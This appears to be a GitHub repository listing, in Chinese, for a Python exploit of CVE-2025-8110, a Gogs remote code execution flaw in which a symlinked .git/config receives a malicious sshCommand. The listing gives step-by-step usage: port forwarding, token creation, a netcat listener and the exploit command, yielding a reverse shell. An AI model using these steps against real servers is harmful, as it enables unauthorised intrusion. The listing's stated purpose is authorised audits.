TYehan/CVE-2025-8110-Gogs-RCE-Exploit

GitHub: TYehan/CVE-2025-8110-Gogs-RCE-Exploit

一个针对 Gogs CVE-2025-8110 RCE 漏洞的自动化利用工具,用于在授权审计中触发反向 Shell。

Stars: 1 | Forks: 0

# Gogs CVE-2025-8110 RCE 漏洞利用 一个用于 Gogs 中 **CVE-2025-8110** 的自动化 Python 漏洞利用程序。该漏洞允许通过滥用 `PutContents` API 进行远程代码执行(RCE),因为该 API 未能验证文件路径是否为符号链接。通过将内部 `.git/config` 文件覆盖为符号链接,我们可以注入恶意的 `sshCommand` 以触发反向连接。 ## 🛠️ 前置条件 请确保已安装 Python 3 及必要的依赖项: ``` pip install requests rich beautifulsoup4 ``` 你还需要安装 **git**,并在执行仓库克隆与提交阶段确保其在 `$PATH` 中可用。 ## ⚙️ 设置与配置 ### 1. 访问 Gogs WebUI Gogs 可能绑定在 `127.0.0.1:3001`。请使用端口转发以本地访问 WebUI: ``` ssh -L 3001:127.0.0.1:3001 user@target-ip ``` ### 2. 创建账户 转发后,访问 `http://localhost:3001`: * 创建一个新账户。 * 记录下你的 **用户名** 与 **密码**,供脚本使用。 ### 3. 生成 API 令牌 该脚本使用 Gogs API 传递载荷: 1. 登录 WebUI。 2. 导航至 **设置** -> **应用**。 3. 在 **管理个人访问令牌** 部分生成新令牌。 4. 立即复制该令牌。 ## 🚀 执行 ### 1. 启动 Netcat 监听器 在运行脚本前启动监听器,因为一旦 API 更新被处理,反向 Shell 便会立即触发。 ``` nc -lvnp 5555 ``` ### 2. 运行漏洞利用脚本 将你的凭证与令牌作为参数传递: ``` python3 exploit.py -u http://localhost:3001 -un -pw -t -lh -lp 5555 ``` ### 参数说明 | 标志 | 描述 | | :--- | :--- | | `-u` | Gogs 实例的基础 URL(例如 `http://localhost:3001`)。 | | `-un` | 你创建的账户用户名。 | | `-pw` | 你创建的账户密码。 | | `-t` | 在设置中生成的 API 令牌。 | | `-lh` | 你的监听器 IP 地址(LHOST)。 | | `-lp` | 你的监听器端口(LPORT)。 | **作者:** [TYehan](https://github.com/TYehan) **免责声明:** 本工具仅供教育用途与授权安全审计使用,请负责任地使用。
标签:API 攻击, CSV导出, CVE-2025-8110, Git 注入, Gogs, IP 地址批量处理, Python 漏洞利用, RCE, Symlink 漏洞, Web 漏洞, 反向 Shell, 编程工具, 网络安全, 网络安全研究, 自动化利用, 远程代码执行, 逆向工具, 隐私保护